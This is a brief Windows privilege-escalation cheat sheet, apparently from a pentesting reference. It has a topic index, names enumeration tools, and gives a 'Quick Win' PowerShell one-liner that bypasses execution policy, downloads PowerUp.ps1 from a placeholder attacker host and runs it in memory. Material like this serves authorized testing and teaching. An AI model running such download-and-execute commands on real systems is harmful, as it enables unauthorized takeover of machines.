Privilege escalation

Index

• Patches Detection
• Services and Processes
• Registry
• Schedules Tasks
• Startup Applications
• Password mining
• Change user / Impersonation
• Admin2System
• Exploits
• Privilege abuse

Quick Win

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://<ip>/PowerUp.ps1'); Invoke-AllChecks | Out-File -Encoding ASCII checks.txt"

SharpUp.exe

Watson.exe

. .\HostEnum.ps1
Invoke-HostEnum -Local -Privesc -HTMLReport

Enumeration

https://cs.piosky.fr/enumeration/windows/